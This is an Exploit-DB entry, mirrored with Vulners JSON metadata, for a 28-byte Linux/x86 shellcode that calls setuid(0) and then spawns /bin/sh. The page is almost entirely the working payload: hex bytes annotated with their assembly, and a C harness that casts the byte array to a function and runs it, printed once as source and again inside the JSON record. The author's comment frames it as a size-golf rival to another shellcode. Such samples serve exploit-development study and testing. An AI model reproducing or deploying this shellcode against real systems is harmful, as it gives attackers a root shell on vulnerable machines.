Search...

Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)

2009-01-01T00:00:00

ID EDB-ID:43657
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            /*
 * (linux/x86) setuid(0) & execve("/bin/sh",0,0) 
 * 28 bytes
 * 
 * http://www.gonullyourself.org
 * sToRm &lt;hixmostorm@hotmail.com&gt;
 * 
 * I made this, because http://www.milw0rm.com/shellcode/7115 felt the need
 * to express his "superior" 28-byte shellcode in all caps.  I wasn't able
 * to beat his code, but it's no longer special.
 */

char shellcode[] =
                                // &lt;_start&gt;:
    "\x31\xdb"                  // xor    %ebx,%ebx
    "\x6a\x17"                  // push   $0x17
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\xf7\xe3"                  // mul    %ebx
    "\xb0\x0b"                  // mov    $0xb,%al
    "\x31\xc9"                  // xor    %ecx,%ecx
    "\x51"                      // push   %ecx
    "\x68\x2f\x2f\x73\x68"      // push   $0x68732f2f
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f
    "\x89\xe3"                  // mov    %esp,%ebx
    "\xcd\x80"                  // int    $0x80
;

int main() {

    int (*f)() = (int(*)())shellcode;
    printf("Length: %u\n", strlen(shellcode));
    f();
    
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:43657", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Linux/x86 - setuid(0) + execve(\"/bin/sh\",0,0) Shellcode (28 bytes)", "description": "Linux/x86 - setuid(0) + execve(\"/bin/sh\",0,0) Shellcode (28 bytes). Shellcode exploit for Linux_x86 platform", "published": "2009-01-01T00:00:00", "modified": "2009-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43657/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-01-24T14:23:55", "viewCount": 4, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-01-24T14:23:55", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-24T14:23:55", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/43657/", "sourceData": "/*\r\n * (linux/x86) setuid(0) & execve(\"/bin/sh\",0,0) \r\n * 28 bytes\r\n * \r\n * http://www.gonullyourself.org\r\n * sToRm <hixmostorm@hotmail.com>\r\n * \r\n * I made this, because http://www.milw0rm.com/shellcode/7115 felt the need\r\n * to express his \"superior\" 28-byte shellcode in all caps. I wasn't able\r\n * to beat his code, but it's no longer special.\r\n */\r\n\r\nchar shellcode[] =\r\n // <_start>:\r\n \"\\x31\\xdb\" // xor %ebx,%ebx\r\n \"\\x6a\\x17\" // push $0x17\r\n \"\\x58\" // pop %eax\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\xf7\\xe3\" // mul %ebx\r\n \"\\xb0\\x0b\" // mov $0xb,%al\r\n \"\\x31\\xc9\" // xor %ecx,%ecx\r\n \"\\x51\" // push %ecx\r\n \"\\x68\\x2f\\x2f\\x73\\x68\" // push $0x68732f2f\r\n \"\\x68\\x2f\\x62\\x69\\x6e\" // push $0x6e69622f\r\n \"\\x89\\xe3\" // mov %esp,%ebx\r\n \"\\xcd\\x80\" // int $0x80\r\n;\r\n\r\nint main() {\r\n\r\n int (*f)() = (int(*)())shellcode;\r\n printf(\"Length: %u\\n\", strlen(shellcode));\r\n f();\r\n \r\n}", "osvdbidlist": [], "immutableFields": []}